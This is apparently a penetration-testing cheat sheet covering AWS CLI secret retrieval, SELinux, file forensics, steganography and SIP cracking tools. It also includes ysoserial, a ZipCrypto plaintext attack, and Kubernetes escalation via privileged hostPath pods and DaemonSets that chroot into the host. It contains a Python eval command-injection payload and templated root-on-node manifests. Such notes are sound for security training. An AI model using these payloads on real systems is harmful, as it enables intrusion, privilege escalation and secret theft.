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Git Repo Analysis
git command cheat sheet
Check current status |
git status |
Check logs |
git log
git log --oneline
Show differences between a specified commit and the previous one |
git show <commit> |
Check differences between current commit and last |
git diff
Check differences between two specific commits |
git diff <older commit> <newer commit> |
General Commands
install aws cli |
apt install awscli |
Configure / Connect to AWS Instance |
aws configure
- AWS Access Key ID [None]: <AWS Access Key>
- AWS Secret Access Key [None]: <AWS Secret Access Key>
- Default region name [None]: <Default region name>
- Default ouput name [None]:
Specify aws endpoint (if not targetting actual AWS servers) |
aws <command> --endpoint-url=<url>
- the cli tool
awslocal specifies the localhost by default
List functions |
aws lambda list-functions --endpoint-url=<url> |
- Bucket link format:
http://s3.[host]/[bucket name]/[file]
Get s3 buckets |
aws s3api list-buckets
aws s3 ls s3://
View s3 bucket |
aws s3 ls s3://<bucket name> |
Copy file to s3 bucket |
aws s3 cp <local file> s3://<bucket name>/<file to save> |
List tables |
aws dynamodb list-tables |
Dump table contents |
aws dynamodb scan --table-name <table name> |
Create a table |
aws dynamodb create-table --cli-input-json file://table.json
table.json example:
"TableName": "alerts",
"KeySchema": [
{ "AttributeName": "title", "KeyType": "HASH" },
{ "AttributeName": "data", "KeyType": "RANGE" }
"AttributeDefinitions": [
{ "AttributeName": "title", "AttributeType": "S" },
{ "AttributeName": "data", "AttributeType": "S" }
"ProvisionedThroughput": {
"ReadCapacityUnits": 10,
"WriteCapacityUnits": 5
Add item to table |
aws dynamodb put-item --cli-input-json file://item.json
item.json example:
"TableName": "alerts",
"S":"This is a test"
CloudWatch / Logs
Get log group names |
aws logs describe-log-groups |
Get log group datastream information |
awslocal logs describe-log-streams --log-group-name <logGroupName> |
Secrets Manager
List secrets |
aws secretsmanager list-secrets |
Get secrets for specified secret 'Name' |
aws secretsmanager get-secret-value --secret-id '<secret 'Name'>' |
Key Management System
List keys |
aws kms list-keys |
Get information about a key |
aws kms describe-key --key-id <key id> |
Decrypt file |
aws kms decrypt --ciphertext-blob fileb://<encrypted file> --key-id <key id> --encryption-algorithm <algorithm from describe-key> |
Set/check enforcement level |
setenforce -h |
Easy way to allow things |
audit2allow -i <input>
grep denied /var/log/audit/audit.log | grep read | tail -1 | audit2allow
Analyze SELinux logs (/var/log/audit/audit.log) |
audit2why |
View policies |
getsebool -a |
Set policies |
setsebool |
View port policies |
semanage port -l |
Python Command Injection
Test for injection: enter math calculation such as 2*2. If the math is being evaluated then a vulnerability
might exist.
Inject commands:
- eval('__import__("os").system("<command>")')
Good resource:
Reading Different File Types
File Type |
Tools |
ost |
- Read output using evolution
SQLite 3 |
sqlite3 <sSQLite 3.x db file> .dump
.exe |
- .NET assembly file Debugger
wasm2wat |
convert to readable text |
wat2wasm |
Convert back to wasm File |
ASAR tool (npm -g install asar)
- extract files from .asar file
- asar e <input>.asar main.js
.pyc |
Steganography: hiding a secret message inside of another file (picture, video, message, etc.)
- steghide
- Example Usage:
Extract data from an image using a password |
steghide extract -sf <File Name> -p <password> |
Extract data |
extract |
Specify file to extract from |
-sf <file name> |
passphrase |
-p |
- If -p flag is not used then we will be prompted for a password.
- We will be prompted for a password whether it is or protected by one or not.
Port Knocking
Linux configuration file
Port knocking tools
- knock
- netcat
- Example netcat port knocking script: for i in <port #> <port #> <port #>; do nc -nv
<ip address> $i; done;
- nmap
SIPVicious - Pentest tool suite
- svmap
- sip scanner. Scans ip address space for SIP servers.
- svwar
- Scans for working extensions. Also tells if the extension line requires authentication or not.
- Example usage:
svwar -e 1-10000 -m INVITE |
Scan extentions 1-10000 on ip using the INVITE method |
- svcrack
- Password cracker using digest authentication. Cracks passwords on both registrar and proxy servers.
- svreport
- Manages sessions created by the other tools and export to pdf, xml, csv, and plain text.
- svcrash
- Responds to svwar and svcrack SIP message that causes old version to crash
HTTP Cookie Flags
HTTP Cookie Flags
Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
`[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]
Http Flag |
Description |
Expires |
By default a cookie lifespan lasts one session, which is traditionally until a browser closes.
Modern browsers might hold onto a cookie longer than that.
Set the shortest reasonable cookie life span for maxmimum security
Max-age |
Domain |
By default a cookie will only be shared with the subdomain that it was generated from.
The domain flag allows you to change the scope of where the cookie shared. If the domain get changed
from the subdomain to the root domain then every subdomain of that root will have access to the
Path |
By default a cookie is only shared with the web path that generated it.
The path paramter can be used to modify the scope of the web path that has access to the cookie. If
the path paramater gets set to / (root) then every path on the website will get access to the
Secure |
By default cookies can be sent over HTTP and HTTPS.
The secure flag will only allow cookies to be sent over HTTPS.
HttpOnly |
Makes the cookie inaccessible to client side scripts. If a browser does not support the HttpOnly flag
then the cookie will still be accessible by scripts. |
SameSite |
When browsing to a website that pulls resources from other websites your browser can send any
cookies you have for those websites.
This flag will alter that behavior based on one of it's three values: Strict, Lax, and None
Strict |
The web request origin must come from you every time. |
Lax |
The web request can be cross-origin if it is an HTTP GET request and you are navigating to
the root directory. Cookies will not be sent when a website loads images or something else
from an external site that you have cookies |
None |
Cookies will always be sent. If None is set then Secure must also be set or the cookie will
not be sent. |
Use ysoserial to generate malicious java serialization file.
- Download ysoserial-master-SNAPSHOT.jar from the Installation section
Syntax: java -jar ysoserial-master-SNAPSHOT.jar <payload type> '<command>'
Configuration file - /etc/gitlab/gitlab.rb
Access console: gitlab-rails console
Console Commands:
Show active users | |
Show admins |
User.admins |
Change user password |
<variable> = User.find(<user id #>)
<user variable>.password = '<new password>'
<user variable>.password_confirmation = '<new password>'
<user variable>.save
Zip File Analysis
- zipdetails
- 7z
List Files |
- l <zip file>
- l -lst <zip file>
- List CRC for each file
- List encrypytion method for each file
- Method = ZipCrypto
- Vulerable to plaintext attack
- Only need to know 10 plaintext characters that exist in the encrypted/zipped
- The more plaintext, the quicker the attack
- Attack steps
Zip plaintext (that mirrors text from the encrypted file) |
zip plaintex.txt |
Check CRC from zipped plaintext file, make sure it is the same as the
encrypted file |
l -lst <zip file> |
Get keys for encrypted file |
bkcrack -C <encrypted zip> -c <encrypted target file on zip>
-P <plaintext zip> -p <plaintext from target encrypted file>
Change encrypted zip password |
bkcrack -C <Encrypted zip file> -k <keys from previous
command> -U <output zip> <new password> |
Kubelete - port 10250
View running pods |
kubeletctl -s <node ip> pods |
Get a shell on a pod |
kubeletctl exec /bin/sh -p <pod name> -n <namespace> -c <container name> -s <node
ip> |
API Server - Port 8443
Run a command |
kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443
Token and ca.crt come from pod directory
- /run/secrets/
Token must be exported to an environment variable for it to work (unconfirmed)
Get list of pods |
kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 get pods
List Permissions |
kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 auth can-i
--list |
- If permission to create a pod, then create one with host file system mounted inside
- Create noderoot.yml
apiVersion: v1
kind: Pod
name: noderootpod
hostNetwork: true
hostPID: true
hostIPC: true
- name: noderootpod
image: busybox (or another valid known image, i.e. pick one from another pre-existing pod)
privileged: true
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
- name: noderoot
path: /
Create the new node: kubectl create -f noderoot.yml
Get a shell on the new node: kubectl exec -it noderootpod chroot /host
- If unable to exec on new pod using kubectl, then try kubeletctl to access the new pod
In order to gain root on all nodes in a cluster use a DaemonSet instead:
apiVersion: apps/v1
kind: DaemonSet
name: noderootpod
name: noderootdaemon
name: noderootdaemon
- key:
effect: NoSchedule
hostNetwork: true
hostPID: true
hostIPC: true
- name: noderootpod
image: busybox (or another valid known image, i.e. pick one from another pre-existing pod)
privileged: true
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
- name: noderoot
path: /
Get root on chosen pod
- Get a shell on a pod: kubectl exec -it <chosen pod from "kubectl get po" output>
chroot /host
- If unable to exec on new pod using kubectl, then try kubeletctl to access the new pod
Unprotect Excel Document
Open excel file with 7zip
Find the worksheet that is protected (xl/worksheet)
Remove full tag for "sheetProtection"